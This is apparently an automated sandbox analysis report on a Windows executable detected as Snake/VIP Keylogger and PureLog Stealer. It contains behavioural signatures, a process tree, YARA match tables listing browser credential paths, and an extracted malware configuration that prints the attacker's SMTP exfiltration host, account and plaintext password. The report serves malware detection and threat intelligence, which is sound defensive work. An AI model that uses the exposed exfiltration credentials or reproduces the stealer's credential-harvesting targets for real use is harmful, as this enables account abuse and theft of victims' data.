Edit tour

Windows Analysis Report
n0nsAzvYNd.exe

Overview

General Information

Sample name:	n0nsAzvYNd.exe renamed because original name is a hash value
Original sample name:	d4e2fbfc32056e62acf75175d7612639a9987bea0b543c1805235c9582d4991a.exe
Analysis ID:	1588599
MD5:	3599e1d5d724fbb382a29f1cad0aeda4
SHA1:	3e1b82de92038cdb85749473ddaef0d680765d23
SHA256:	d4e2fbfc32056e62acf75175d7612639a9987bea0b543c1805235c9582d4991a
Tags:	exeRedLineStealeruser-adrian__luca
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

n0nsAzvYNd.exe (PID: 1672 cmdline: "C:\Users\user\Desktop\n0nsAzvYNd.exe" MD5: 3599E1D5D724FBB382A29F1CAD0AEDA4)

RegSvcs.exe (PID: 4148 cmdline: "C:\Users\user\Desktop\n0nsAzvYNd.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "sales@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sales@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2054161886.0000000000340000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 88 88 44 24 2B 88 44 24 2F B0 F9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000002.00000002.4511931022.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 88 88 44 24 2B 88 44 24 2F B0 F9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000002.00000002.4516159706.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4516159706.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7f8e5:$a1: get_encryptedPassword 0x7f8b9:$a2: get_encryptedUsername 0x7f97d:$a3: get_timePasswordChanged 0x7f895:$a4: get_passwordField 0x7f8fb:$a5: set_encryptedPassword 0x7f6c8:$a7: get_logins 0x7ad26:$a10: KeyLoggerEventArgs 0x7acf5:$a11: KeyLoggerEventArgsEventHandler 0x7f79c:$a13: _encryptedPassword
00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ef2f:$a1: get_encryptedPassword 0x3ef03:$a2: get_encryptedUsername 0x3efc7:$a3: get_timePasswordChanged 0x3eedf:$a4: get_passwordField 0x3ef45:$a5: set_encryptedPassword 0x3ed12:$a7: get_logins 0x3a370:$a10: KeyLoggerEventArgs 0x3a33f:$a11: KeyLoggerEventArgsEventHandler 0x3ede6:$a13: _encryptedPassword
00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a0b0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49753:$a3: \Google\Chrome\User Data\Default\Login Data 0x499b0:$a4: \Orbitum\User Data\Default\Login Data 0x4a38f:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3cae2:$s1: UnHook 0x3ca7e:$s2: SetHook 0x3cab7:$s3: CallNextHook 0x3ca46:$s4: _hook
00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e047:$a1: get_encryptedPassword 0x3e01b:$a2: get_encryptedUsername 0x3e0df:$a3: get_timePasswordChanged 0x3dff7:$a4: get_passwordField 0x3e05d:$a5: set_encryptedPassword 0x3de2a:$a7: get_logins 0x39488:$a10: KeyLoggerEventArgs 0x39457:$a11: KeyLoggerEventArgsEventHandler 0x3defe:$a13: _encryptedPassword
00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x491c8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4886b:$a3: \Google\Chrome\User Data\Default\Login Data 0x48ac8:$a4: \Orbitum\User Data\Default\Login Data 0x494a7:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3bbfa:$s1: UnHook 0x3bb96:$s2: SetHook 0x3bbcf:$s3: CallNextHook 0x3bb5e:$s4: _hook
00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.4513561000.0000000003131000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 4148	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 4148	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 4148	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 4148	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xea913:$a1: get_encryptedPassword 0x173b95:$a1: get_encryptedPassword 0x1878e8:$a1: get_encryptedPassword 0xea8e7:$a2: get_encryptedUsername 0x173b69:$a2: get_encryptedUsername 0x1878bc:$a2: get_encryptedUsername 0xea9ab:$a3: get_timePasswordChanged 0x173c2d:$a3: get_timePasswordChanged 0x187980:$a3: get_timePasswordChanged 0xea8c3:$a4: get_passwordField 0x173b45:$a4: get_passwordField 0x187898:$a4: get_passwordField 0xea929:$a5: set_encryptedPassword 0x173bab:$a5: set_encryptedPassword 0x1878fe:$a5: set_encryptedPassword 0xea6ff:$a7: get_logins 0x173981:$a7: get_logins 0x1876d4:$a7: get_logins 0xe6c7b:$a10: KeyLoggerEventArgs 0x16fefd:$a10: KeyLoggerEventArgs 0x183b34:$a10: KeyLoggerEventArgs
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.RegSvcs.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 88 88 44 24 2B 88 44 24 2F B0 F9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0.2.n0nsAzvYNd.exe.340000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 88 88 44 24 2B 88 44 24 2F B0 F9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 88 88 44 24 2B 88 44 24 2F B0 F9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.2.RegSvcs.exe.55b0000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.55b0000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.55b0000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.55b0000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.55b0000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c247:$a1: get_encryptedPassword 0x3c21b:$a2: get_encryptedUsername 0x3c2df:$a3: get_timePasswordChanged 0x3c1f7:$a4: get_passwordField 0x3c25d:$a5: set_encryptedPassword 0x3c02a:$a7: get_logins 0x37688:$a10: KeyLoggerEventArgs 0x37657:$a11: KeyLoggerEventArgsEventHandler 0x3c0fe:$a13: _encryptedPassword
2.2.RegSvcs.exe.55b0000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x473c8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x46a6b:$a3: \Google\Chrome\User Data\Default\Login Data 0x46cc8:$a4: \Orbitum\User Data\Default\Login Data 0x476a7:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.55b0000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x39dfa:$s1: UnHook 0x39d96:$s2: SetHook 0x39dcf:$s3: CallNextHook 0x39d5e:$s4: _hook
2.2.RegSvcs.exe.2eca89e.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2eca89e.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2eca89e.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2eca89e.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2eca89e.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c247:$a1: get_encryptedPassword 0x3c21b:$a2: get_encryptedUsername 0x3c2df:$a3: get_timePasswordChanged 0x3c1f7:$a4: get_passwordField 0x3c25d:$a5: set_encryptedPassword 0x3c02a:$a7: get_logins 0x37688:$a10: KeyLoggerEventArgs 0x37657:$a11: KeyLoggerEventArgsEventHandler 0x3c0fe:$a13: _encryptedPassword
2.2.RegSvcs.exe.2eca89e.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x473c8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x46a6b:$a3: \Google\Chrome\User Data\Default\Login Data 0x46cc8:$a4: \Orbitum\User Data\Default\Login Data 0x476a7:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2eca89e.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x39dfa:$s1: UnHook 0x39d96:$s2: SetHook 0x39dcf:$s3: CallNextHook 0x39d5e:$s4: _hook
2.2.RegSvcs.exe.2ec99b6.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2ec99b6.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.2ec99b6.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2ec99b6.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2ec99b6.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2ec99b6.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ef2f:$a1: get_encryptedPassword 0x3ef03:$a2: get_encryptedUsername 0x3efc7:$a3: get_timePasswordChanged 0x3eedf:$a4: get_passwordField 0x3ef45:$a5: set_encryptedPassword 0x3ed12:$a7: get_logins 0x3a370:$a10: KeyLoggerEventArgs 0x3a33f:$a11: KeyLoggerEventArgsEventHandler 0x3ede6:$a13: _encryptedPassword
2.2.RegSvcs.exe.2ec99b6.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a0b0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49753:$a3: \Google\Chrome\User Data\Default\Login Data 0x499b0:$a4: \Orbitum\User Data\Default\Login Data 0x4a38f:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2ec99b6.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3cae2:$s1: UnHook 0x3ca7e:$s2: SetHook 0x3cab7:$s3: CallNextHook 0x3ca46:$s4: _hook
2.2.RegSvcs.exe.2eca89e.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2eca89e.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.2eca89e.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2eca89e.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2eca89e.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2eca89e.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e047:$a1: get_encryptedPassword 0x3e01b:$a2: get_encryptedUsername 0x3e0df:$a3: get_timePasswordChanged 0x3dff7:$a4: get_passwordField 0x3e05d:$a5: set_encryptedPassword 0x3de2a:$a7: get_logins 0x39488:$a10: KeyLoggerEventArgs 0x39457:$a11: KeyLoggerEventArgsEventHandler 0x3defe:$a13: _encryptedPassword
2.2.RegSvcs.exe.2eca89e.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x491c8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4886b:$a3: \Google\Chrome\User Data\Default\Login Data 0x48ac8:$a4: \Orbitum\User Data\Default\Login Data 0x494a7:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2eca89e.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3bbfa:$s1: UnHook 0x3bb96:$s2: SetHook 0x3bbcf:$s3: CallNextHook 0x3bb5e:$s4: _hook
2.2.RegSvcs.exe.3080000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.3080000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.3080000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.3080000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.3080000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d12f:$a1: get_encryptedPassword 0x3d103:$a2: get_encryptedUsername 0x3d1c7:$a3: get_timePasswordChanged 0x3d0df:$a4: get_passwordField 0x3d145:$a5: set_encryptedPassword 0x3cf12:$a7: get_logins 0x38570:$a10: KeyLoggerEventArgs 0x3853f:$a11: KeyLoggerEventArgsEventHandler 0x3cfe6:$a13: _encryptedPassword
2.2.RegSvcs.exe.3080000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x482b0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47953:$a3: \Google\Chrome\User Data\Default\Login Data 0x47bb0:$a4: \Orbitum\User Data\Default\Login Data 0x4858f:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.3080000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3ace2:$s1: UnHook 0x3ac7e:$s2: SetHook 0x3acb7:$s3: CallNextHook 0x3ac46:$s4: _hook
2.2.RegSvcs.exe.3080ee8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.3080ee8.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.3080ee8.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.3080ee8.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.3080ee8.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c247:$a1: get_encryptedPassword 0x3c21b:$a2: get_encryptedUsername 0x3c2df:$a3: get_timePasswordChanged 0x3c1f7:$a4: get_passwordField 0x3c25d:$a5: set_encryptedPassword 0x3c02a:$a7: get_logins 0x37688:$a10: KeyLoggerEventArgs 0x37657:$a11: KeyLoggerEventArgsEventHandler 0x3c0fe:$a13: _encryptedPassword
2.2.RegSvcs.exe.3080ee8.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x473c8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x46a6b:$a3: \Google\Chrome\User Data\Default\Login Data 0x46cc8:$a4: \Orbitum\User Data\Default\Login Data 0x476a7:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.3080ee8.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x39dfa:$s1: UnHook 0x39d96:$s2: SetHook 0x39dcf:$s3: CallNextHook 0x39d5e:$s4: _hook
2.2.RegSvcs.exe.3080ee8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.3080ee8.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.3080ee8.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.3080ee8.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.3080ee8.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.3080ee8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e047:$a1: get_encryptedPassword 0x3e01b:$a2: get_encryptedUsername 0x3e0df:$a3: get_timePasswordChanged 0x3dff7:$a4: get_passwordField 0x3e05d:$a5: set_encryptedPassword 0x3de2a:$a7: get_logins 0x39488:$a10: KeyLoggerEventArgs 0x39457:$a11: KeyLoggerEventArgsEventHandler 0x3defe:$a13: _encryptedPassword
2.2.RegSvcs.exe.3080ee8.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x491c8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4886b:$a3: \Google\Chrome\User Data\Default\Login Data 0x48ac8:$a4: \Orbitum\User Data\Default\Login Data 0x494a7:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.3080ee8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3bbfa:$s1: UnHook 0x3bb96:$s2: SetHook 0x3bbcf:$s3: CallNextHook 0x3bb5e:$s4: _hook
2.2.RegSvcs.exe.3080000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.3080000.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
